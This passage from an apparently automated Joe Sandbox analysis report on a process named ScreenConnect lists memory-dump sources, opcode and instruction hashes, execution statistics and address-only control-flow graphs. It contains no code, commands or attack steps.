                                                                      • Instruction ID: e248f298a305cae338cdd55b41977e2d698ba327a28072c8281b9a8cc5fe1e77
                                                                      • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                      • Instruction Fuzzy Hash: B5110076404280CFDB16CF54D9C0B1ABF72FB98320F24C6A9D9090B257C33AD45ADBA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2587253915.0000000001B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B4D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1b4d000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 43cd392eb4dfdccd8c54fe24e86a9163bd24b205aab5d034a75fa97b23accf47
                                                                      • Instruction ID: cbbce078137336b903289c1c2dd617290330cd6dba1f7ffde87dd01e7d1defe8
                                                                      • Opcode Fuzzy Hash: 43cd392eb4dfdccd8c54fe24e86a9163bd24b205aab5d034a75fa97b23accf47
                                                                      • Instruction Fuzzy Hash: 7601807240D3C05FE7174B258C94752BFA8EF57220F0985CBE9848F2A3C2695C45C772
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2587253915.0000000001B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B4D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1b4d000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d90c79d05a0b3f07f12ecc90ff88e022ccbf33fc410be2a3b012ef27924e27b0
                                                                      • Instruction ID: 49dcc779b48c3bace4951c8390d48d8e213d4fa9d6bf9d81fd6722d5fbe3a643
                                                                      • Opcode Fuzzy Hash: d90c79d05a0b3f07f12ecc90ff88e022ccbf33fc410be2a3b012ef27924e27b0
                                                                      • Instruction Fuzzy Hash: 7A012B715053409BE7248A5ECC84B67BF98DF593A0F08C59AED494F382C3799841D6B1

                                                                      Execution Graph

                                                                      Execution Coverage:13.8%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:8
                                                                      Total number of Limit Nodes:1
                                                                      execution_graph 5163 7ffe7ccb804c 5165 7ffe7ccb806d 5163->5165 5164 7ffe7ccb8082 5165->5164 5166 7ffe7ccb80f6 SetProcessMitigationPolicy 5165->5166 5167 7ffe7ccb8152 5166->5167 5159 7ffe7ccb365a 5160 7ffe7ccd5670 ConnectNamedPipe 5159->5160 5162 7ffe7ccd5722 5160->5162

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 130 7ffe7cfc770f-7ffe7cfc771c 131 7ffe7cfc7766-7ffe7cfc7776 130->131 132 7ffe7cfc771e-7ffe7cfc773a 130->132 140 7ffe7cfc7778-7ffe7cfc777a 131->140 141 7ffe7cfc777c-7ffe7cfc778a 131->141 133 7ffe7cfc7b48-7ffe7cfc7b66 call 7ffe7cfc0b60 * 2 132->133 134 7ffe7cfc7740-7ffe7cfc775e call 7ffe7cfc0b60 * 2 132->134 148 7ffe7cfc7b6c-7ffe7cfc7b73 133->148 149 7ffe7cfc7c72-7ffe7cfc7c7d 133->149 150 7ffe7cfc79de-7ffe7cfc79fc call 7ffe7cfc0b60 * 2 134->150 151 7ffe7cfc7764-7ffe7cfc7765 134->151 144 7ffe7cfc778d-7ffe7cfc77a2 140->144 141->144 153 7ffe7cfc77a8-7ffe7cfc77cc call 7ffe7cfc66f0 * 2 144->153 154 7ffe7cfc77a4-7ffe7cfc77a6 144->154 155 7ffe7cfc7b86-7ffe7cfc7b88 148->155 156 7ffe7cfc7b75-7ffe7cfc7b84 148->156 170 7ffe7cfc7a26-7ffe7cfc7a44 call 7ffe7cfc0b60 * 2 150->170 171 7ffe7cfc79fe-7ffe7cfc7a08 150->171 151->131 159 7ffe7cfc77cf-7ffe7cfc77e4 153->159 154->159 161 7ffe7cfc7b8f-7ffe7cfc7bb3 155->161 156->155 168 7ffe7cfc7b8a 156->168 173 7ffe7cfc77e6-7ffe7cfc77e8 159->173 174 7ffe7cfc77ea-7ffe7cfc780e call 7ffe7cfc66f0 * 2 159->174 175 7ffe7cfc7bff-7ffe7cfc7c03 161->175 176 7ffe7cfc7bb5-7ffe7cfc7bb6 161->176 168->161 195 7ffe7cfc7afb-7ffe7cfc7b06 170->195 196 7ffe7cfc7a4a-7ffe7cfc7a55 170->196 177 7ffe7cfc7a1c 171->177 178 7ffe7cfc7a0a-7ffe7cfc7a1a 171->178 179 7ffe7cfc7811-7ffe7cfc7826 173->179 174->179 175->149 176->175 182 7ffe7cfc7a1e-7ffe7cfc7a1f 177->182 178->182 189 7ffe7cfc7828-7ffe7cfc782a 179->189 190 7ffe7cfc782c-7ffe7cfc7850 call 7ffe7cfc66f0 179->190 182->170 193 7ffe7cfc7853-7ffe7cfc7861 189->193 190->193 203 7ffe7cfc7867-7ffe7cfc7875 193->203 204 7ffe7cfc7863-7ffe7cfc7865 193->204 205 7ffe7cfc7b08-7ffe7cfc7b0a 195->205 206 7ffe7cfc7b0c-7ffe7cfc7b1b 195->206 201 7ffe7cfc7a57-7ffe7cfc7a59 196->201 202 7ffe7cfc7a5b-7ffe7cfc7a6a 196->202 207 7ffe7cfc7a6d-7ffe7cfc7a91 201->207 202->207 208 7ffe7cfc7878-7ffe7cfc788f 203->208 204->208 209 7ffe7cfc7b1e-7ffe7cfc7b20 205->209 206->209 207->195 208->150 216 7ffe7cfc7895-7ffe7cfc789c 208->216 209->149 213 7ffe7cfc7b26-7ffe7cfc7b2e 209->213 213->133 216->150 217 7ffe7cfc78a2-7ffe7cfc78b9 216->217 219 7ffe7cfc78bb-7ffe7cfc78cd 217->219 220 7ffe7cfc78ee-7ffe7cfc78f9 217->220 225 7ffe7cfc78cf-7ffe7cfc78d1 219->225 226 7ffe7cfc78d3-7ffe7cfc78e1 219->226 223 7ffe7cfc78fb-7ffe7cfc78fd 220->223 224 7ffe7cfc78ff-7ffe7cfc790e 220->224 227 7ffe7cfc7911-7ffe7cfc7913 223->227 224->227 228 7ffe7cfc78e4-7ffe7cfc78e7 225->228 226->228 230 7ffe7cfc7919-7ffe7cfc7930 227->230 231 7ffe7cfc79c8-7ffe7cfc79d0 227->231 228->220 230->231 234 7ffe7cfc7936-7ffe7cfc7953 230->234 231->150 237 7ffe7cfc795f 234->237 238 7ffe7cfc7955-7ffe7cfc795d 234->238 239 7ffe7cfc7961-7ffe7cfc7963 237->239 238->239 239->231 241 7ffe7cfc7965-7ffe7cfc796f 239->241 242 7ffe7cfc797d-7ffe7cfc7985 241->242 243 7ffe7cfc7971-7ffe7cfc797b call 7ffe7cfc4608 241->243 245 7ffe7cfc7987-7ffe7cfc7988 242->245 246 7ffe7cfc79b3-7ffe7cfc79c6 call 7ffe7cfc6718 242->246 243->150 243->242 245->246 246->150
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 68261a091b99a76cf2e9999ce78a4c1bb335dc2fcd0daf9dffc20e46fe8e9bd7
                                                                      • Instruction ID: 428c43947505824f54f0a8ba586cb2c8988a43dc29424fccd52aec2c558b39ff
                                                                      • Opcode Fuzzy Hash: 68261a091b99a76cf2e9999ce78a4c1bb335dc2fcd0daf9dffc20e46fe8e9bd7
                                                                      • Instruction Fuzzy Hash: 36C1BB32BACE5B4EE7ADD76C80517B962D6EF94340F50407AD16EC32E2DF28B8428341

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2607985029.00007FFE7CCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CCB0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7ccb0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: MitigationPolicyProcess
                                                                      • String ID:
                                                                      • API String ID: 1088084561-0
                                                                      • Opcode ID: a4fb26721f9878f4472be8c49c2c661e86a807968af222bf7405176a2b78ac99
                                                                      • Instruction ID: 1a55269702e409bfd725c70efcd1c8fd41ee8770ef4adb070725d30f1f5f5638
                                                                      • Opcode Fuzzy Hash: a4fb26721f9878f4472be8c49c2c661e86a807968af222bf7405176a2b78ac99
                                                                      • Instruction Fuzzy Hash: 6441333090CB188FDB14AFA8984A5FA7BE4EF55311F04417FE089C3662DF28A856CB91

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2607985029.00007FFE7CCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CCB0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7ccb0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: ConnectNamedPipe
                                                                      • String ID:
                                                                      • API String ID: 2191148154-0
                                                                      • Opcode ID: b459a47e1d848e06520064901dddb177dbf8bc7a53b8cf97eaf4bb227cd34e7f
                                                                      • Instruction ID: 6c8db0d42a1d9481185cd06d05a70895b69b5bf47d6f3b7ea9b70b02d3d42b3c
                                                                      • Opcode Fuzzy Hash: b459a47e1d848e06520064901dddb177dbf8bc7a53b8cf97eaf4bb227cd34e7f
                                                                      • Instruction Fuzzy Hash: E6317F71908A1C8FDB58EF98C8497EEB7F1FB59311F00826AD049D7256DB74A846CB81

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2607985029.00007FFE7CCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CCB0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7ccb0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: MitigationPolicyProcess
                                                                      • String ID:
                                                                      • API String ID: 1088084561-0
                                                                      • Opcode ID: 17511f38005087bbfbbc25f128962cb6ef9148128128a7cf00a7ac3e40a08c42
                                                                      • Instruction ID: 5b503b528d0c1b0d8293b17c9a9cb548bf3cbb3d7277bb82f3230828be0fc581
                                                                      • Opcode Fuzzy Hash: 17511f38005087bbfbbc25f128962cb6ef9148128128a7cf00a7ac3e40a08c42
                                                                      • Instruction Fuzzy Hash: 9121D73191CB188FDB18AF9CD84A6F977E4EB59711F00412FE049D3651DB74B846CB91

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 250 7ffe7cfc0496 251 7ffe7cfc0498 250->251 251->251 252 7ffe7cfc049a-7ffe7cfc04ae 251->252 254 7ffe7cfc04ca 252->254 255 7ffe7cfc04b0-7ffe7cfc04b1 252->255 256 7ffe7cfc04cf-7ffe7cfc04d5 254->256 255->254 257 7ffe7cfc04db-7ffe7cfc04e4 256->257 258 7ffe7cfc056e-7ffe7cfc0571 256->258 260 7ffe7cfc04e6-7ffe7cfc04e7 257->260 261 7ffe7cfc04fd-7ffe7cfc0508 257->261 259 7ffe7cfc0573-7ffe7cfc057d 258->259 264 7ffe7cfc0585-7ffe7cfc05a2 259->264 260->261 262 7ffe7cfc050a-7ffe7cfc050b 261->262 263 7ffe7cfc0554-7ffe7cfc0558 261->263 262->263 263->258 267 7ffe7cfc061e-7ffe7cfc062a 264->267 268 7ffe7cfc05a4 264->268 269 7ffe7cfc062c-7ffe7cfc062e 267->269 270 7ffe7cfc0630-7ffe7cfc0631 267->270 271 7ffe7cfc05a6-7ffe7cfc05aa 268->271 272 7ffe7cfc05ea-7ffe7cfc05f6 268->272 274 7ffe7cfc0641-7ffe7cfc065e 269->274 273 7ffe7cfc0632-7ffe7cfc063e 270->273 277 7ffe7cfc05ac-7ffe7cfc05b1 271->277 278 7ffe7cfc061b-7ffe7cfc061c 271->278 275 7ffe7cfc05f8-7ffe7cfc05fa 272->275 276 7ffe7cfc05fc-7ffe7cfc060a 272->276 273->274 287 7ffe7cfc0660-7ffe7cfc0662 274->287 288 7ffe7cfc0664-7ffe7cfc0672 274->288 279 7ffe7cfc060d-7ffe7cfc062a 275->279 276->279 277->273 280 7ffe7cfc05b3-7ffe7cfc05be 277->280 278->267 279->269 279->270 284 7ffe7cfc05c0-7ffe7cfc05e6 280->284 285 7ffe7cfc062f 280->285 293 7ffe7cfc05ec-7ffe7cfc05f6 284->293 294 7ffe7cfc0730-7ffe7cfc074e 284->294 285->270 290 7ffe7cfc0675-7ffe7cfc0692 287->290 288->290 296 7ffe7cfc0698-7ffe7cfc06a6 290->296 297 7ffe7cfc0694-7ffe7cfc0696 290->297 293->275 293->276 305 7ffe7cfc07ed-7ffe7cfc07f8 294->305 306 7ffe7cfc0754-7ffe7cfc075e 294->306 298 7ffe7cfc06a9-7ffe7cfc06bf 296->298 297->298 303 7ffe7cfc06d6-7ffe7cfc06dd 298->303 304 7ffe7cfc06c1-7ffe7cfc06d4 298->304 311 7ffe7cfc06e4-7ffe7cfc06f7 303->311 304->303 313 7ffe7cfc06fd-7ffe7cfc0700 304->313 307 7ffe7cfc0760-7ffe7cfc0762 306->307 308 7ffe7cfc0764-7ffe7cfc0772 306->308 310 7ffe7cfc0775-7ffe7cfc0792 307->310 308->310 317 7ffe7cfc0798-7ffe7cfc07a6 310->317 318 7ffe7cfc0794-7ffe7cfc0796 310->318 311->313 315 7ffe7cfc0717-7ffe7cfc072a 313->315 316 7ffe7cfc0702-7ffe7cfc0715 313->316 315->294 316->294 316->315 319 7ffe7cfc07a9-7ffe7cfc07c6 317->319 318->319 323 7ffe7cfc07c8-7ffe7cfc07ca 319->323 324 7ffe7cfc07cc-7ffe7cfc07da 319->324 325 7ffe7cfc07dd-7ffe7cfc07e6 323->325 324->325 325->305
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9aa3b83a4caf59d7bed8060d236cf6f64307d720d23e18cc4d6188096a59129e
                                                                      • Instruction ID: 9e07241e835d3173694ab8250ee4fae14becefb361fce4ca10bb45366bf23729
                                                                      • Opcode Fuzzy Hash: 9aa3b83a4caf59d7bed8060d236cf6f64307d720d23e18cc4d6188096a59129e
                                                                      • Instruction Fuzzy Hash: 82A18371B68A4A4FEBACEB1CC051BB537D5FF98301F544078E45EC72A2DE68E8428741

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 421 7ffe7cfc68c1-7ffe7cfc68f4 call 7ffe7cfc4a30 call 7ffe7cfc0b60 * 2 429 7ffe7cfc68fa-7ffe7cfc6908 421->429 430 7ffe7cfc768e-7ffe7cfc76a1 421->430 432 7ffe7cfc690a-7ffe7cfc690c 429->432 433 7ffe7cfc690e-7ffe7cfc691d 429->433 434 7ffe7cfc6920-7ffe7cfc6922 432->434 433->434 435 7ffe7cfc6928-7ffe7cfc6944 434->435 436 7ffe7cfc6a62-7ffe7cfc6a65 434->436 435->436 451 7ffe7cfc694a-7ffe7cfc695c 435->451 438 7ffe7cfc6a6b-7ffe7cfc6a76 436->438 439 7ffe7cfc6ba0-7ffe7cfc6ba7 436->439 441 7ffe7cfc6a78-7ffe7cfc6a79 438->441 442 7ffe7cfc6ac2-7ffe7cfc6ac6 438->442 443 7ffe7cfc6c37-7ffe7cfc6c3e 439->443 444 7ffe7cfc6bad-7ffe7cfc6bb4 439->444 441->442 442->439 445 7ffe7cfc6c49-7ffe7cfc6c5c 443->445 446 7ffe7cfc6c40-7ffe7cfc6c47 443->446 444->443 447 7ffe7cfc6bba-7ffe7cfc6bc4 444->447 458 7ffe7cfc6c6d-7ffe7cfc6c75 445->458 459 7ffe7cfc6c5e-7ffe7cfc6c63 445->459 446->445 449 7ffe7cfc6c86-7ffe7cfc6c8d 446->449 447->449 455 7ffe7cfc6bca-7ffe7cfc6bd2 447->455 453 7ffe7cfc6ef1-7ffe7cfc6ef8 449->453 454 7ffe7cfc6c93-7ffe7cfc6c9a 449->454 456 7ffe7cfc69aa-7ffe7cfc69ae 451->456 457 7ffe7cfc695e-7ffe7cfc695f 451->457 453->430 461 7ffe7cfc6efe-7ffe7cfc6f05 453->461 454->453 460 7ffe7cfc6ca0-7ffe7cfc6ca3 454->460 455->443 456->436 457->456 463 7ffe7cfc6c7b-7ffe7cfc6c7f 458->463 464 7ffe7cfc76e1-7ffe7cfc770a 458->464 459->458 465 7ffe7cfc6cac-7ffe7cfc6cba 460->465 466 7ffe7cfc6ca5-7ffe7cfc6ca7 460->466 461->430 462 7ffe7cfc6f0b-7ffe7cfc6f1d 461->462 468 7ffe7cfc6f69-7ffe7cfc6f6d 462->468 469 7ffe7cfc6f1f-7ffe7cfc6f20 462->469 463->449 474 7ffe7cfc6cbc 465->474 475 7ffe7cfc6cbe 465->475 467 7ffe7cfc6d5a-7ffe7cfc6d5d 466->467 472 7ffe7cfc6d66-7ffe7cfc6d74 467->472 473 7ffe7cfc6d5f-7ffe7cfc6d61 467->473 468->430 469->468 481 7ffe7cfc6d78 472->481 482 7ffe7cfc6d76 472->482 476 7ffe7cfc6e15-7ffe7cfc6e1b 473->476 477 7ffe7cfc6cc0-7ffe7cfc6cc3 474->477 475->477 478 7ffe7cfc6ecd-7ffe7cfc6ecf 476->478 479 7ffe7cfc6e21-7ffe7cfc6e23 476->479 483 7ffe7cfc6ccd-7ffe7cfc6cd8 477->483 484 7ffe7cfc6cc5-7ffe7cfc6ccb 477->484 478->453 486 7ffe7cfc6ed1-7ffe7cfc6ed9 478->486 479->478 485 7ffe7cfc6e29-7ffe7cfc6e2a 479->485 487 7ffe7cfc6d7a-7ffe7cfc6d7d 481->487 482->487 489 7ffe7cfc6cda-7ffe7cfc6cdb 483->489 490 7ffe7cfc6d24-7ffe7cfc6d28 483->490 488 7ffe7cfc6d48-7ffe7cfc6d58 484->488 485->478 486->453 491 7ffe7cfc6edb-7ffe7cfc6ee3 486->491 492 7ffe7cfc6d87-7ffe7cfc6d92 487->492 493 7ffe7cfc6d7f-7ffe7cfc6d85 487->493 488->467 489->490 490->488 491->453 495 7ffe7cfc6dde-7ffe7cfc6de2 492->495 496 7ffe7cfc6d94-7ffe7cfc6d95 492->496 494 7ffe7cfc6e03-7ffe7cfc6e13 493->494 494->476 495->494 496->495
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a0b795bf6eb2bb95a6edaf56f72b0245f313a352367f5ba153003fe6148ee7a
                                                                      • Instruction ID: 5619e7f5e8128034e3dbc02c1ccaa6bbcb73997f3315ea598646c5518b6aeeca
                                                                      • Opcode Fuzzy Hash: 2a0b795bf6eb2bb95a6edaf56f72b0245f313a352367f5ba153003fe6148ee7a
                                                                      • Instruction Fuzzy Hash: B581E732BACA5A8BEBBD9A1C90513B533D5EF49344F5501B9C86DC71E6DE2DEC028341

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 511 7ffe7cfc0560-7ffe7cfc0568 512 7ffe7cfc07ed-7ffe7cfc07f8 511->512 513 7ffe7cfc056e-7ffe7cfc05a2 511->513 518 7ffe7cfc061e-7ffe7cfc062a 513->518 519 7ffe7cfc05a4 513->519 520 7ffe7cfc062c-7ffe7cfc062e 518->520 521 7ffe7cfc0630-7ffe7cfc0631 518->521 522 7ffe7cfc05a6-7ffe7cfc05aa 519->522 523 7ffe7cfc05ea-7ffe7cfc05f6 519->523 525 7ffe7cfc0641-7ffe7cfc065e 520->525 524 7ffe7cfc0632-7ffe7cfc063e 521->524 528 7ffe7cfc05ac-7ffe7cfc05b1 522->528 529 7ffe7cfc061b-7ffe7cfc061c 522->529 526 7ffe7cfc05f8-7ffe7cfc05fa 523->526 527 7ffe7cfc05fc-7ffe7cfc060a 523->527 524->525 538 7ffe7cfc0660-7ffe7cfc0662 525->538 539 7ffe7cfc0664-7ffe7cfc0672 525->539 530 7ffe7cfc060d-7ffe7cfc062a 526->530 527->530 528->524 531 7ffe7cfc05b3-7ffe7cfc05be 528->531 529->518 530->520 530->521 535 7ffe7cfc05c0-7ffe7cfc05e6 531->535 536 7ffe7cfc062f 531->536 544 7ffe7cfc05ec-7ffe7cfc05f6 535->544 545 7ffe7cfc0730-7ffe7cfc074e 535->545 536->521 541 7ffe7cfc0675-7ffe7cfc0692 538->541 539->541 547 7ffe7cfc0698-7ffe7cfc06a6 541->547 548 7ffe7cfc0694-7ffe7cfc0696 541->548 544->526 544->527 545->512 556 7ffe7cfc0754-7ffe7cfc075e 545->556 549 7ffe7cfc06a9-7ffe7cfc06bf 547->549 548->549 554 7ffe7cfc06d6-7ffe7cfc06dd 549->554 555 7ffe7cfc06c1-7ffe7cfc06d4 549->555 561 7ffe7cfc06e4-7ffe7cfc06f7 554->561 555->554 563 7ffe7cfc06fd-7ffe7cfc0700 555->563 557 7ffe7cfc0760-7ffe7cfc0762 556->557 558 7ffe7cfc0764-7ffe7cfc0772 556->558 560 7ffe7cfc0775-7ffe7cfc0792 557->560 558->560 567 7ffe7cfc0798-7ffe7cfc07a6 560->567 568 7ffe7cfc0794-7ffe7cfc0796 560->568 561->563 565 7ffe7cfc0717-7ffe7cfc072a 563->565 566 7ffe7cfc0702-7ffe7cfc0715 563->566 565->545 566->545 566->565 569 7ffe7cfc07a9-7ffe7cfc07c6 567->569 568->569 573 7ffe7cfc07c8-7ffe7cfc07ca 569->573 574 7ffe7cfc07cc-7ffe7cfc07da 569->574 575 7ffe7cfc07dd-7ffe7cfc07e6 573->575 574->575 575->512
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c752b80fcb7bdb4df3a253d851fcd5d52d5dba2ee9cc1d45ce17a9ba0cce4a3a
                                                                      • Instruction ID: 6009be699835b5b5f05d5615ceb29b948b2452b492faad96fcab9b44b70dc1f3
                                                                      • Opcode Fuzzy Hash: c752b80fcb7bdb4df3a253d851fcd5d52d5dba2ee9cc1d45ce17a9ba0cce4a3a
                                                                      • Instruction Fuzzy Hash: 24711C717A8A4A8FEBACEB1CC491BA537D5FF58301F504478E46EC72A1DE68E8428740

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 577 7ffe7cfc5550 578 7ffe7cfc5551 577->578 578->578 579 7ffe7cfc5553-7ffe7cfc5586 578->579 581 7ffe7cfc5588-7ffe7cfc55a9 579->581 582 7ffe7cfc55b1-7ffe7cfc55e4 579->582 581->582 583 7ffe7cfc55ea-7ffe7cfc55f9 582->583 584 7ffe7cfc5724-7ffe7cfc5753 582->584 587 7ffe7cfc5604-7ffe7cfc5606 583->587 585 7ffe7cfc5755-7ffe7cfc575f call 7ffe7cfc4608 584->585 586 7ffe7cfc57a4-7ffe7cfc57b8 584->586 585->586 594 7ffe7cfc5761-7ffe7cfc5773 585->594 588 7ffe7cfc57e8-7ffe7cfc57f3 586->588 589 7ffe7cfc57ba-7ffe7cfc57c4 586->589 587->584 591 7ffe7cfc560c-7ffe7cfc5682 587->591 589->588 592 7ffe7cfc57c6-7ffe7cfc57d7 589->592 591->584 592->588 599 7ffe7cfc57d9-7ffe7cfc57e1 592->599 594->586 595 7ffe7cfc5775-7ffe7cfc579f call 7ffe7cfc51f0 594->595 595->586 599->588
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bb3a8c7c24cde49ada7b8235a423aa9fda42d4e57f4ab62280b58e0ebf00dd41
                                                                      • Instruction ID: eee35601ca95fb7a17487da0ce4be5bd4f08107eceaefb906b2b2dd31f4fcb78
                                                                      • Opcode Fuzzy Hash: bb3a8c7c24cde49ada7b8235a423aa9fda42d4e57f4ab62280b58e0ebf00dd41
                                                                      • Instruction Fuzzy Hash: 33714F35659A498FDFDCEF1CC494AA573E2FF5830476409ACD06ACF296CA26E857CB00

                                                                      Control-flow Graph

                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 76d845fe538de43c42eb73f1bdfacbf459a02d1033625dd6af7bfd27fb0da90d
                                                                      • Instruction ID: 46a88897ca5d36f109a79c9dd6255b5b8d8d41af3ce2cb97ba40760b5ffb4fc6
                                                                      • Opcode Fuzzy Hash: 76d845fe538de43c42eb73f1bdfacbf459a02d1033625dd6af7bfd27fb0da90d
                                                                      • Instruction Fuzzy Hash: 2751F434658A498FCBDCEF18C094BA177E6FF99304B2445A9D069CF697CA25E847C740
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b10716e9a1397ce9ce6af6f871bd6beec03e126c493015c7796c87fa5f334d17
                                                                      • Instruction ID: a0cf34e27d046a02c4f3cc8e6642e2518f34cdee4cc7ac9b4aad4e5e806bdf11
                                                                      • Opcode Fuzzy Hash: b10716e9a1397ce9ce6af6f871bd6beec03e126c493015c7796c87fa5f334d17
                                                                      • Instruction Fuzzy Hash: 6B112F2266C8864FEB98DB2CD4547B5B3E1FFA5390B2841BBC459CB1B2DF19A843C340
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ed08a97a69af3bf33ae7d1a41860a211c6360b443ece935de20b89a22626bb04
                                                                      • Instruction ID: 36b0b642d5d1978bfe2453903c0baea0b6dbc5cfa06140013a042d300f3015f3
                                                                      • Opcode Fuzzy Hash: ed08a97a69af3bf33ae7d1a41860a211c6360b443ece935de20b89a22626bb04
                                                                      • Instruction Fuzzy Hash: AE21C312BAC9860FE7A9972C44A077562DAAF85340F5580B6C46DC72F3CF1CEC05C391
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14e66b260165b079a1b828a6c2316f09ea073a474341c2d8aeb010f748a9513f
                                                                      • Instruction ID: db63002e721c5edfb8ca9483259d17b25116567136a9353c445c242cd03cf038
                                                                      • Opcode Fuzzy Hash: 14e66b260165b079a1b828a6c2316f09ea073a474341c2d8aeb010f748a9513f
                                                                      • Instruction Fuzzy Hash: CC11493160C9488FDF98DE18D4A1FB533E1FBA9314F2400ACD85ECB297CA22E842CB40
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
